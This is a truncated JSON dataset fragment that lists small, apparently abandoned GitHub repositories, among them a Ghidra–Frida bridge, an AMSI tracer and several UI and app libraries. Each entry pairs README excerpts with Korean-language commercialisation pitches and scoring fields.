介绍\r\n\r\n项目已经迁移：\r\n源码github：https://github.com/yc-l/yc.boilerplate\r\n源码gitee：https://gitee.com/yc-power/yc.boilerplate\r\n","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"federicodotta/ghidra2frida","github_url":"https://github.com/federicodotta/ghidra2frida","stars":6,"language":"Java","license":"MIT","abandonment_months":29,"description":"# ghidra2frida 상품화 분석\n\n## 왜 보물인가\n프로그램 분석 전문가들이 복잡한 작업을 자동화할 수 있는 도구로, 보안 연구와 악성코드 분석 시간을 획기적으로 단축시킵니다.\n\n## 어디에 쓸 수 있나\n\n**1. 보안 감시 SaaS 서비스**\n기업의 애플리케이션 취약점을 자동으로 찾아주는 클라우드 기반 검사 서비스로 운영할 수 있습니다.\n\n**2.","readme_excerpt":"# ghidra2frida\n[![](https://img.shields.io/github/stars/federicodotta/ghidra2frida.svg?color=yellow)](https://github.com/federicodotta/ghidra2frida)\n[![](https://img.shields.io/github/forks/federicodotta/ghidra2frida.svg?color=green)](https://github.com/federicodotta/ghidra2frida)\n[![](https://img.shields.io/github/issues-raw/federicodotta/ghidra2frida.svg?color=red)](https://github.com/federicodotta/ghidra2frida/issues)\n[![](https://img.shields.io/badge/license-MIT%20License-red.svg?color=lightgray)](https://opensource.org/licenses/MIT) \n[![](https://img.shields.io/badge/twitter-apps3c-blue.svg)](https://twitter.com/apps3c)\n\nghidra2frida is a Ghidra Extension that, working as a bridge between [Ghidra](https://ghidra-sre.org/) and [Frida](https://www.frida.re/), lets you create powerful Ghidra scripts that take advantage of Frida's dynamic analysis engine to improve Ghidra statical analysis features. It supports all platforms supported by Frida (Windows, macOS, Linux, iOS, Android, and","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"fossasia/susi_viberbot","github_url":"https://github.com/fossasia/susi_viberbot","stars":12,"language":"JavaScript","license":"Apache-2.0","abandonment_months":98,"description":"# SUSI Viberbot 사업화 분석\n\n## 왜 보물인가\n사용자가 메신저 앱(Viber)에서 직접 AI 챗봇과 대화하며 정보를 얻을 수 있는 기술로, 별도 앱 설치 없이 접근성이 뛰어납니다.\n\n## 어디에 쓸 수 있나\n1. **고객 지원 SaaS**: 이커머스 업체들이 Viber를 통해 고객 문의에 자동 응답하는 서비스\n2. **채용 공고 봇**: 취업","readme_excerpt":"# Getting Started : Viber Susi AI Bot Installation \n\nIt's easy for you to create your own Viber messenger bot and integrate susi's API into it. You can read the [documentation](https://support.viber.com/customer/en/portal/articles/2554141-create-a-public-account?b_id=13518) on how to make a public account in Viber and get started.\n\nMessenger bots uses a web server to process messages it receives or to figure out what messages to send.\n\n## Prerequisites\nTo create your account on -:\n1. Viber\n2. Github\n3. Heroku\n\n## Setup your own Messenger Bot\n1. Fork this repository.\n\n2. Request for a public account on Viber.\n\n [Fill this form](https://support.viber.com/customer/widget/emails/new?interaction_name=NEWEA)\n \n <img src=\"./docs/images/getPermissionForPA.png\" alt=\"alt text\">\n \n Follow the instructions for verification as indicated by viber.\n \n 3. After verification, create and setup the public account.\n \n Click Second button from top-right, to discover public accounts made by you.\n \n <img src","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"KubeHelper/kubehelper","github_url":"https://github.com/KubeHelper/kubehelper","stars":11,"language":"Java","license":"GPL-3.0","abandonment_months":64,"description":"# KubeHelper 상용화 분석\n\n## 왜 보물인가\n복잡한 서버 관리 작업을 간단하게 자동화할 수 있는 도구로, 중소 IT팀의 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 서버 관리 플랫폼으로 제공하여 기술팀이 웹에서 직접 서버를 제어하게 함\n2. **내부 업무 도구**: 기업의 IT팀이 자체 ","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://github.com/KubeHelper/kubehelper/blob/main/src/main/resources/web/img/logo-full.png\" width=\"500\" />\n</p>\n \n---       \n\n##### KubeHelper - simplifies many daily Kubernetes cluster tasks through a web interface. Search, analysis, run commands, cron jobs, reports, filters, git synchronization and many more.\n\n[![LICENSE](https://img.shields.io/badge/license-GNU%20v3-green)](https://github.com/KubeHelper/kubehelper/blob/main/LICENSE)\n![Docker Pulls](https://img.shields.io/docker/pulls/kubehelper/kubehelper)\n![Docker Stars](https://img.shields.io/docker/stars/kubehelper/kubehelper)\n[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=KubeHelper_kubehelper&metric=alert_status)](https://sonarcloud.io/dashboard?id=KubeHelper_kubehelper)\n[![Security Rating](https://sonarcloud.io/api/project_badges/measure?project=KubeHelper_kubehelper&metric=security_rating)](https://sonarcloud.io/dashboard?id=KubeHelper_kubehelper)\n[![Bugs](http","composite_score":0.5008,"license_safety_tag":"restricted"},{"name":"Hadenix/kernel_umidigi_f2_mt6771_4.14","github_url":"https://github.com/Hadenix/kernel_umidigi_f2_mt6771_4.14","stars":10,"language":"C","license":"NOASSERTION","abandonment_months":58,"description":"# Hadenix/kernel_umidigi_f2_mt6771_4.14 분석\n\n## 왜 보물인가\n특정 휴대폰 모델(우미디지 F2)의 핵심 소프트웨어 설계도로, 해당 제조사나 개발자들이 기술 개선이나 보안 업데이트에 직접 활용할 수 있는 희귀한 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **휴대폰 제조사 기술 지원 서비스**: 우미디지 F2 사용자를 위한","readme_excerpt":"Linux kernel\n============\n\nThis file was moved to Documentation/admin-guide/README.rst\n\nPlease notice that there are several guides for kernel developers and users.\nThese guides can be rendered in a number of formats, like HTML and PDF.\n\nIn order to build the documentation, use ``make htmldocs`` or\n``make pdfdocs``.\n\nThere are various text files in the Documentation/ subdirectory,\nseveral of them using the Restructured Text markup notation.\nSee Documentation/00-INDEX for a list of what is contained in each file.\n\nPlease read the Documentation/process/changes.rst file, as it contains the\nrequirements for building and running the kernel, and information about\nthe problems which may result by upgrading your kernel.\n\n## All other files are located here: https://gitlab.com/Hadenix1/umidigi_open_source_code_mtk\n","composite_score":0.5008,"license_safety_tag":"unknown"},{"name":"postcss-rs/postcss-rs","github_url":"https://github.com/postcss-rs/postcss-rs","stars":8,"language":"Rust","license":"MIT","abandonment_months":43,"description":"# postcss-rs 분석 리포트\n\n## 왜 보물인가\n웹 디자인 파일을 빠르게 처리하는 도구를 Rust라는 안정적인 프로그래밍 언어로 만들어, 기존 도구보다 훨씬 빠르고 안정적으로 작동할 수 있다는 점이 핵심입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 디자인 최적화 SaaS**: 고객이 업로드한 웹 디자인 파일을 자동으로 정리하고 빠르게 처리해주는 구","readme_excerpt":"# postcss-rs\n\n🚀 Fast and 100% API compatible postcss replacer, built in Rust\n\n> ⚠️ DO NOT USE. STILL WORK IN PROGRESS.\n\n## Performance Improvement\n\nRun benchmark:\n\n```bash\ncargo build --release --locked --bin \"benchmark*\"\ncargo run --release --bin benchmark\n```\n\nTokenizer (Compare with Node.js v16.13.0):\n\n```bash\njs:   0.71s user 0.09s system 152% cpu 0.619 total\nrust: 0.03s user 0.01s system  93% cpu 0.039 total\n```\n\n| **file** | tailwind-components.css | bootstrap-reboot.css | bootstrap-grid.css | bootstrap.css | tailwind.css | tailwind-dark.css |\n| -------: | ----------------------: | -------------------: | -----------------: | ------------: | -----------: | ----------------: |\n| **size** |                    2.8K |                 7.4K |                71K |          201K |         3.5M |              5.8M |\n|   **js** |                 1.813ms |              2.380ms |           11.856ms |      33.919ms |    167.309ms |         224.577ms |\n| **rust** |                 0.019ms |    ","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"rodydavis/easy_google_maps","github_url":"https://github.com/rodydavis/easy_google_maps","stars":19,"language":"Dart","license":"MIT","abandonment_months":57,"description":"","readme_excerpt":"[![Buy Me A Coffee](https://img.shields.io/badge/Donate-Buy%20Me%20A%20Coffee-yellow.svg)](https://www.buymeacoffee.com/rodydavis)\n[![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=WSH3GVC49GNNJ)\n\n# easy_google_maps\n\nEasy Google Maps for Flutter on Web and Mobile\n\n## Getting Started\n\n### Mobile\n\nFollow setup for Mobile [Here](https://pub.dev/packages/google_maps_flutter)\n\n### Web\n\nGood to go!\n\n```dart\nEasyGoogleMaps(\n    apiKey: 'YOUR_API_KEY_HERE',\n    address: 'Infinite Loop, Cupertino, CA 95014',\n    title: 'Apple Campus',\n)\n```\n\n- When you change the address the map will automatically move the camera position to the new marker\n- Optionally give a width and height\n- API Key is Required from [Google Maps](https://developers.google.com/maps/documentation/embed/get-api-key)\n\n## Screenshots\n\n![](https://github.com/rodydavis/easy_google_maps/blob/master/doc/screenshots/1.png?raw=true)\n![](https://github.","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"DhyanaChina/simpler-paper","github_url":"https://github.com/DhyanaChina/simpler-paper","stars":9,"language":"TypeScript","license":"MIT","abandonment_months":101,"description":"# DhyanaChina/simpler-paper 분석\n\n## 왜 보물인가\n복잡한 논문 작성 과정을 단순하게 자동화해주는 도구로, 학생과 연구자들의 시간을 크게 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 대학생을 위한 월 구독형 논문 작성 도우미 웹서비스로 운영\n2. **내부 업무 도구**: 기업 연구팀이 보고서와 기술","readme_excerpt":"\n<p align=\"center\" height=\"300\">\n<img src=\"https://github.com/DhyanaChina/simpler-paper/blob/master/logo.png\" align=\"center\">\n</p>\n\n<p align=center>\n<a target=\"_blank\" href=\"https://www.npmjs.com/package/simpler-paper\" title=\"NPM version\"><img src=\"https://img.shields.io/github/package-json/v/DhyanaChina/simpler-paper.svg?style=flat-square\"></a>\n<a target=\"_blank\" href=\"http://nodejs.org/download/\" title=\"Node version\"><img src=\"https://img.shields.io/badge/node.js-%3E=_6.0-green.svg?style=flat-square\"></a>\n<a target=\"_blank\" href=\"https://opensource.org/licenses/MIT\" title=\"License: MIT\"><img src=\"https://img.shields.io/github/license/mashape/apistatus.svg?style=flat-square\"></a>\n<a target=\"_blank\" href=\"https://travis-ci.org/DhyanaChina/simpler-paper\" title=\"Build Status\"><img src=\"https://img.shields.io/travis/DhyanaChina/simpler-paper/master.svg?style=flat-square\"></a>\n<a target=\"_blank\" href=\"https://www.npmjs.com/package/simpler-paper\" title=\"Downloads\"><img src=\"https://img.shie","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"rocketmlhq/sciml","github_url":"https://github.com/rocketmlhq/sciml","stars":17,"language":"Jupyter Notebook","license":"unknown","abandonment_months":55,"description":"# rocketmlhq/sciml 사업화 분석\n\n## 왜 보물인가\n과학 연구와 데이터 분석에 필요한 복잡한 계산을 자동으로 해주는 도구로, 연구자들의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대학 연구팀이나 기업 R&D 부서가 구독하는 클라우드 기반 분석 플랫폼\n2. **내부 업무 도구**: 제약사나 ","readme_excerpt":"# SC21 Tutorial on Scientific Machine Learning\n\nIn this repository, you can find all the example notebooks used for SC21 full-day tutorial: _Scientific Machine Learning using HPC Servers on Cloud_\n\n\n## Contents\n\n- [Resources](#resources)\n- [Target Audience](#target-audience)\n- [Content Level](#content-level)\n- [Prerequisites](#prerequisites)\n- [Getting Started](#getting-started)\n- [Frequently Asked Questions](#faq)\n\n## Resources\n\n- [Slack Invite](https://join.slack.com/t/sciml-workspace/shared_invite/zt-xfzyqf2u-zh4GRt7sRoh4RLSY9~yyJw)\n- [Youtube Playlist](https://www.youtube.com/watch?v=ssZO8Y_TqxI&list=PLcK0exoS00ZTPdvhmh0IdyCIlVQ2lzjJ5)\n- [RocketML support](mailto:rocketml@20230188.hubspot-inbox.com)\n- [DeepXDE](https://github.com/lululxvi/deepxde)\n- [DiffNet](https://github.com/adityabalu/DiffNet)\n\n\n## Target Audience\nPractitioners who use numerical simulations of Partial Differential Equations (PDEs) in analysis, optimization, design and control of complex engineered systems\n\n## C","composite_score":0.5008,"license_safety_tag":"unknown"},{"name":"shmsw25/Channel-LM-Prompting","github_url":"https://github.com/shmsw25/Channel-LM-Prompting","stars":5,"language":"Python","license":"unknown","abandonment_months":50,"description":"# Channel-LM-Prompting 저장소 분석\n\n## 왜 보물인가\nAI 언어 모델에게 효과적으로 명령을 전달하는 새로운 방법론으로, 챗GPT 같은 AI와의 상호작용 품질을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **AI 글쓰기 SaaS**: 기업 블로그나 마케팅 콘텐츠 자동 생성 도구에 통합하여 더 정확한 결과 제공\n- **내부 ","readme_excerpt":"# Channel LM Prompting (and beyond)\n\nThis includes an original implementation of Sewon Min, Mike Lewis, Hannaneh Hajishirzi, Luke Zettlemoyer. \"[Noisy Channel Language Model Prompting for Few-Shot Text Classification][paper]\" 2021.\n\n<p align=\"center\">\n  <img src=\"img/teaser.png\" width=\"50%\" height=\"50%\">\n</p>\n\n\nFor any questions about the paper or the code, or to request pretrained checkpoints, please contact the first author ([email](mailto:cs.washington.edu)) or leave issues.\n\nIf you find our code or paper useful, please cite the paper:\n```\n@article{ min2021noisy ,\n  title={ Noisy Channel Language Model Prompting for Few-Shot Text Classification },\n  author={ Min, Sewon and Lewis, Mike and Hajishirzi, Hannaneh and Zettlemoyer, Luke },\n  journal={ arXiv preprint },\n  year={ 2021 }\n}\n```\n\nThis also includes implementations of many recent papers studying prompt-based learning. Please make sure to cite corresponding papers when you use implementations of the methods in this repo.\n* Brown","composite_score":0.5008,"license_safety_tag":"unknown"},{"name":"elrumordelaluz/csshake","github_url":"https://github.com/elrumordelaluz/csshake","stars":7,"language":"SCSS","license":"mit","abandonment_months":24,"description":"# csshake 프로젝트 분석\n\n## 왜 보물인가\n웹사이트의 버튼이나 텍스트를 흔들리게 만드는 시각 효과 도구로, 디자인 초보자도 몇 줄의 코드만으로 전문적인 애니메이션을 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 이메일 마케팅 플랫폼에서 중요한 버튼을 흔들려 사용자의 눈길을 끌도록 판매\n- **내부 업무 도구**: 기업","readme_excerpt":"# CSShake [![npm version](https://badge.fury.io/js/csshake.svg)](http://badge.fury.io/js/csshake)\n\n> Some CSS classes to move your DOM!\n\n### [Live Demo](http://elrumordelaluz.github.io/csshake/)\n\n### [Download Center](https://csshake.surge.sh/)\n\nYou could download the complete `csshake.css` file or separated files for each shake animation (i.e `csshake-little.css`).\nEach one expanded or minified.\n\n## Why\n\nI had to do a 'shake-animation' for a big project. First, I did it in vanilla CSS.\nAfter finish it I discover [this](http://jackrugile.com/jrumble/) cool jQuery plugin by [@jackrugile](https://twitter.com/jackrugile).\nThen I started to think in made _[this little CSS project](http://elrumordelaluz.github.io/csshake/)_\n\n## Install\n\nFork this repo\n\n```\n  $ git clone https://github.com/elrumordelaluz/csshake.git\n```\n\nor via Bower\n\n```\n  $ bower install csshake\n```\n\nor via npm\n\n```\n  $ npm i csshake\n```\n\n#### scripts\n\n```\n  $ npm run watch\n  $ npm run build:raw\n  $ npm run build:min\n```\n\n","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"vadagama/sever_crew","github_url":"https://github.com/vadagama/sever_crew","stars":20,"language":"","license":"unknown","abandonment_months":55,"description":"# vadagama/sever_crew 분석 보고서\n\n## 왜 보물인가\n서버 관리 작업을 자동화해서 운영 비용을 크게 줄일 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 호스팅 회사가 고객의 서버를 자동으로 관리하고 모니터링하는 서비스로 제공\n2. **내부 업무 도구**: IT팀이 자사의 여러 서버를 한 곳에서 통합 관리","readme_excerpt":"# The Farmacy Family Architectural Kata by O'Reilly\n\nWelcome to the Farmacy Family Architectural Kata run by [O'Reilly](https://www.oreilly.com/) in October - November 2021. This is an architectural documentation for the solution proposal from Sever Crew team.\n\n## Results\n<img align=\"right\" width=\"225\" height=\"318\" src=\"images/medal.png\">\nWe became the 2nd place Winners in this competition.\n\n## Contents\n- [About the team](#about_the_team)\n- [Overview](#overview)  \n- [Baseline Architecture](#baseline_architecture)  \n    - [Context](#baseline_context)\n    - [Containers](#baseline_containers)\n- [Initial requirements](#initial_requirements)  \n    - [Primary goals](#primary_goals)\n    - [User requirements](#user_requirements)\n    - [Stakeholders](#stakeholders)\n    - [Constraints](#constraints)\n    - [User stories](#user_stories)\n- [Target Architecture](#target_architecture)\n    - [Context](#target_context)\n    - [Containers](#target_containers)\n    - [Assumptions](#assumptions)\n    - [Sign","composite_score":0.5008,"license_safety_tag":"unknown"},{"name":"ARM-software/mobile-studio-integration-for-unity","github_url":"https://github.com/ARM-software/mobile-studio-integration-for-unity","stars":7,"language":"C","license":"BSD-3-Clause","abandonment_months":27,"description":"# ARM-software/mobile-studio-integration-for-unity 분석\n\n## 왜 보물인가\n게임 개발자들이 성능을 최적화하기 위해 필요한 ARM(모바일 칩) 전문 도구를 Unity 게임 엔진에 바로 연결해주는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 게임 개발사를 위한 클라우드 기반 성능 분석 및 최적","readme_excerpt":"Performance Studio Package\n==========================\n\nThis project is a Unity package for integrating the Performance Studio tool\nsuite into game development workflows. This version of the package has the\nfollowing features for integrating with the Streamline profiler.\n\n* C# language bindings for emitting event annotations.\n* C# language bindings for emitting software counters.\n\n> **Note:** Performance Studio was formerly known as Mobile Studio. For API\n> backwards compatibility the package continues to use the `MobileStudio` file\n> name prefix and C# namespace.\n\nLicense\n=======\n\nMost files in this library are licensed under the BSD-3 Clause License (see\n[LICENSE.md](LICENSE.md)).\n\nThe Unity native plugin interface header, `IUnityInterface.h`, is licensed\nunder the Unity Companion License (see [LICENSE_UNITY.md](LICENSE_UNITY.md)).\n\nTechnical details\n=================\n\nRequirements\n------------\n\nThis version of the package is compatible with the Unity Editor version 2020.3\nLTS and lat","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"manyfacedllama/amsi-tracer","github_url":"https://github.com/manyfacedllama/amsi-tracer","stars":9,"language":"C++","license":"GPL-3.0","abandonment_months":62,"description":"# AMSI Tracer 상용화 분석\n\n## 왜 보물인가\n컴퓨터 보안을 감시하는 윈도우의 핵심 보호 시스템(AMSI)을 추적하고 분석할 수 있는 거의 유일한 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 회사의 SaaS 위협 탐지 서비스**: AMSI 추적 기술을 클라우드 기반 악성코드 검사 플랫폼에 통합\n2. **기업 IT 부서의 내부 감","readme_excerpt":"# amsi-tracer\nLeverage AMSI (Antimalware Scan Interface) technology to aid your analysis.\n\nThis tool saves all buffers (scripts, .NET assemblies, etc) passed into AMSI during dynamic execution.\n\n![Demo (WSHRAT)](wshrat_demo.gif)\n\n## Basic overview\nAMSI is (originally) intended for application & AV vendors to interact with one another through a standard interface. Out of the box, it is integrated into the following Windows components for scanning:\n* Powershell/JScript/VBScript (scripts, interactive use, and dynamic code evaluation)\n* [Office macros](https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps#amsi-integration-with-javascriptvba)\n* .NET Framework 4.8 ([in-memory loading via Assembly.Load](https://devblogs.microsoft.com/dotnet/announcing-net-framework-4-8-early-access-build-3694/#runtime-antimalware-scanning-for-all-assemblies))\n* Windows Management Instrumentation (WMI)\n* ...\n\nAs malware (Windows) usually depend on one of these components within their execution cha","composite_score":0.5008,"license_safety_tag":"restricted"},{"name":"RXJ-D/ZJU_CST_DS","github_url":"https://github.com/RXJ-D/ZJU_CST_DS","stars":5,"language":"","license":"Apache-2.0","abandonment_months":91,"description":"# RXJ-D/ZJU_CST_DS 분석 보고서\n\n## 왜 보물인가\n浙江大학교 컴퓨터공학과의 공식 데이터 구조 교육 자료로, 대학 수준의 검증된 학습 콘텐츠를 무료로 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼**: 코딩 입문자용 구조화된 강의 콘텐츠로 활용하여 월 구독 서비스 제공\n2. **기업 신입사원 교육**: IT회사들의 프로","readme_excerpt":"# ZJU_CST_DS\n## 浙江大学软件学院考研878专业课资料及复习指导\n## 1．878考试的试卷结构及分值\n试卷分为两部分：C语言部分，数据结构部分，总共分值150，考试时间：3小时，14:00-17:00 \n### C语言部分：\n\t分值：60分 \n\t题型：单项选择题（30分，15道，每题2分）\n\t\t  分析题（30分，5道，每题6分）具体题型为：看程序写出程序运行结果，或程序填空题\n### 数据结构部分：\n\t分值：90分\n\t题型：单项选择题（40分，20道，每题2分）\n\t\t  大题：一般是4道。\n\t第1-2题是应用题，一般考查：1.深度优先，广度优先遍历（给一个图，让写遍历的结果序列）2.哈希表，解决冲突的不同方法 \n\t3.各种排序 等等\n\t第3题 程序填空题（分值为12-16分，一空4分，3-4空），非常重要，一般为平时上课源代码，或稍加改写。考查内容为，堆排序，树，图典型算法。一种比较好的应对方式是 在理解的基础上，摘抄代码，加深印象，并在临近考试时多多看几遍。\n\t第4题 程序编写题 （分值8分）题型多变，也是试卷上要求写代码最多的一道题，一般考查树，排序，图相关知识点。\n给定一颗二叉排序树，找到任意两个节点的最近公共祖先\n## 2. 学习笔记的整理方法\n\t排序，树，图的部分算法需要摘抄以加深印象，其余部分笔记直接记在辅导书上即可\n## 3.关于878专业课考试\n \t878是浙江大学计算机学院老师自主命题，题目大多来自往年真题,期末考试题的原题或原题改编。\n\n## 最后10天,大家加油呀!\n","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"DonnC/log_book","github_url":"https://github.com/DonnC/log_book","stars":16,"language":"Dart","license":"unknown","abandonment_months":60,"description":"# DonnC/log_book 분석 보고서\n\n## 왜 보물인가\n일상의 생각과 경험을 체계적으로 기록하고 관리할 수 있는 간단한 도구로, 개인의 성장 기록과 자산화에 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월간 구독형 일기/노트 앱으로, 클라우드 동기화와 검색 기능을 제공하는 유료 서비스\n2. **내부 업무 도구**: 기업의","readme_excerpt":"![logo](assets/images/app_icon.png)\n# LogBook Desktop App\n\nan internship log book desktop app\n\n## Table of contents\n- [LogBook Desktop App](#logbook-desktop-app)\n  - [Table of contents](#table-of-contents)\n  - [Features](#features)\n  - [Log Book Format](#log-book-format)\n  - [Demo](#demo)\n  - [Screenshots](#screenshots)\n  - [Change Log](#change-log)\n  - [Plugins](#plugins)\n  - [Appreciation](#appreciation)\n  - [Made with Flutter 💙](#made-with-flutter-)\n    - [Ico ref](#ico-ref)\n\n## Features\n- [x] Create quick ToDos\n- [x] Delete ToDos\n- [x] Add Log Book entry with date and workdone\n- [x] View added logbooks in grid / list view\n- [x] Generate and print all logbooks\n\n<br>\n\n## Log Book Format\n| Date       \t| Work Done                                                                                                  \t| Signature \t|\n|------------\t|-----------------------------------------------------------------------------------------------------------\t|-----------\t|\n| 10/12/2020 \t| - Learnt ","composite_score":0.5008,"license_safety_tag":"unknown"},{"name":"FeiGeChuanShu/ncnn-Android-mediapipe_hand","github_url":"https://github.com/FeiGeChuanShu/ncnn-Android-mediapipe_hand","stars":6,"language":"C++","license":"unknown","abandonment_months":55,"description":"# ncnn-Android-mediapipe_hand 분석 보고서\n\n## 왜 보물인가\n휴대폰 카메라만으로 손 위치와 동작을 인식하는 기술로, 별도의 특수 장비 없이 손 제스처 인터페이스를 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS - 비대면 수어 번역 앱**: 수어를 실시간으로 텍스트로 변환하는 클라우드 기반 서비스\n2. **내부 ","readme_excerpt":"## The Android demo of [Mediapipe Hand](https://google.github.io/mediapipe/solutions/hands)  infer by ncnn  \n\n## Please enjoy the mediapipe hand demo on ncnn\n\nYou can try this APK demo https://pan.baidu.com/s/1ArAMH7uAic0cQJgOn-P-RQ pwd: jnrw  \n\nhttps://github.com/Tencent/ncnn  \nhttps://github.com/nihui/opencv-mobile\n## palm model support:  \n1.palm-lite  \n2.palm-full  \n## pose model support:  \n1.hand-lite  \n2.hand-full  \n\n## how to build and run\n### step1\nhttps://github.com/Tencent/ncnn/releases\n\n* Download ncnn-YYYYMMDD-android-vulkan.zip or build ncnn for android yourself\n* Extract ncnn-YYYYMMDD-android-vulkan.zip into **app/src/main/jni** and change the **ncnn_DIR** path to yours in **app/src/main/jni/CMakeLists.txt**\n\n### step2\nhttps://github.com/nihui/opencv-mobile\n\n* Download opencv-mobile-XYZ-android.zip\n* Extract opencv-mobile-XYZ-android.zip into **app/src/main/jni** and change the **OpenCV_DIR** path to yours in **app/src/main/jni/CMakeLists.txt**\n\n### step3\n* Open this proje","composite_score":0.5008,"license_safety_tag":"unknown"},{"name":"Ghost2097221/selfMimikatz","github_url":"https://github.com/Ghost2097221/selfMimikatz","stars":16,"language":"C++","license":"unknown","abandonment_months":55,"description":"# Ghost2097221/selfMimikatz 분석\n\n## 왜 보물인가\n이 프로젝트는 컴퓨터 보안 전문가들이 시스템 접근 권한을 테스트할 때 사용하는 핵심 도구로, 기업의 보안 취약점을 찾아내는 데 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 보안 진단 서비스 (SaaS)**: 회사들이 월 구독으로 자신의 시스템 보안 상태를 정기적으로 ","readme_excerpt":"一个自不量力的mimikatz分离计划","composite_score":0.5008,"license_safety_tag":"unknown"},{"name":"chadly/lottie-to-svg","github_url":"https://github.com/chadly/lottie-to-svg","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":61,"description":"# chadly/lottie-to-svg 사업화 분석\n\n## 왜 보물인가\n애니메이션 파일을 웹에서 바로 사용할 수 있는 형태로 자동 변환해주는 도구로, 디자이너와 개발자의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 디자인 도구(피그마 경쟁사)에서 애니메이션을 자동으로 웹용으로 변환해주는 기능 제","readme_excerpt":"# Lottie to SVG Converter\n\n> Convert a frame of a [Lottie animation](https://github.com/airbnb/lottie-web) into an SVG. You may also be interested in the [Gatsby Remark plugin](https://github.com/chadly/gatsby-remark-lottie) that uses this project.\n\nConvert this animation to a standard SVG:\n\n| Animation                 |  Static SVG                                     |\n| ------------------------- | ----------------------------------------------- |\n| ![animation](example.gif) | <img src=\"example.svg\" width=\"300\" alt=\"SVG\" /> |\n\nThis SVG is converted from [this animation](https://lottiefiles.com/28784-businessmen-at-the-table) from [Lottie Files](https://lottiefiles.com/).\n\n> Note that this README shows the animation as a GIF since I can't load the lottie scripts in a README.\n\n### Wait, just one frame?\n\nYes, just one frame. This can be useful to show a preview of your animation as an SVG before the lottie animation script has fully loaded.\n\nIf you found this project because you wanted t","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"fatbobman/NavigationViewKit","github_url":"https://github.com/fatbobman/NavigationViewKit","stars":11,"language":"Swift","license":"MIT","abandonment_months":33,"description":"# NavigationViewKit 분석 보고서\n\n## 왜 보물인가\nApple의 iOS 앱에서 화면 전환을 쉽게 만들어주는 도구로, 앱 개발자들의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. iOS 앱 개발 템플릿 SaaS**\n- 이 도구를 기본으로 탑재한 앱 개발 템플릿을 월간 구독으로 판매할 수 있습니다.\n\n**2. 모바","readme_excerpt":"# NavigationViewKit #\n\n[中文版说明](READMECN.md)\n\nNavigationViewKit is a NavigationView extension library for SwiftUI.\n\nFor more detailed documentation and demo, please visit [用NavigationViewKit增强SwiftUI的导航视图](https://www.fatbobman.com/posts/NavigationViewKit/)\n\nThe extension follows several principles.\n\n* Non-disruptive\n\nAny new feature does not affect the native functionality provided by Swiftui, especially if it does not affect the performance of Toolbar, NavigationLink in NavigationView\n\n* Be as easy to use as possible\n\n  Add new features with minimal code\n\n* SwiftUI native style\n\n  Extensions should be called in the same way as the native SwiftUI as much as possible\n\n\n## NavigationViewManager ##\n\n### Introduction ###\n\nOne of the biggest complaints from developers about NavigationView is that it does not support a convenient means of returning to the root view. There are two commonly used solutions.\n\n* Repackage the `UINavigationController`\n\n  A good wrapper can indeed use the many func","composite_score":0.5008,"license_safety_tag":"safe"},{"name":"wacko1805/Pixel-Wallpaper-app","github_url":"https://github.com/wacko1805/Pixel-Wallpaper-app","stars":7,"language":"Kotlin","license":"unknown","abandonment_months":27,"description":"# Pixel-Wallpaper-app 분석\n\n## 왜 보물인가\n스마트폰 배경화면을 쉽게 꾸밀 수 있는 앱으로, 많은 사람들이 일상적으로 필요로 하는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **배경화면 구독 서비스**: 매달 새로운 고품질 배경화면을 제공하는 월간 구독 앱으로 운영\n2. **휴대폰 테마 쇼핑몰**: 디자이너들이 만든 배경화면","readme_excerpt":"# ![](https://raw.githubusercontent.com/wacko1805/Pixel-Wallpaper-app/main/assets/Pixel%20Wallpapers.png)\n## An app full of 200+ Stock Google Pixel wallpapers! Download:\n  <a href=\"[https://github.com/wacko1805/Pixel-Wallpaper-app/releases/download/v1.0.5/dev.wacko1805.pixel.wallpapers-v1.0.5-debug.apk](https://github.com/wacko1805/Pixel-Wallpaper-app/releases/tag/v1.0.6)\"><img src=\"https://raw.githubusercontent.com/wacko1805/Pixel-Wallpaper-app/main/assets/download.png\" width=\"300px\"></a><br>\n  ![GitHub all releases](https://img.shields.io/github/downloads/wacko1805/pixel-Wallpaper-app/total?style=for-the-badge)\n  \n## Found a Wallpaper not on the app? Submit and issue to the [Google Pixel Wallpaper](https://github.com/wacko1805/google-pixel-wallpapers) repository\n\n ## Screenshots:\n<img width=\"30%\" src=\"https://raw.githubusercontent.com/wacko1805/Pixel-Wallpaper-app/main/assets/sc-2.png\"><img width=\"30%\" 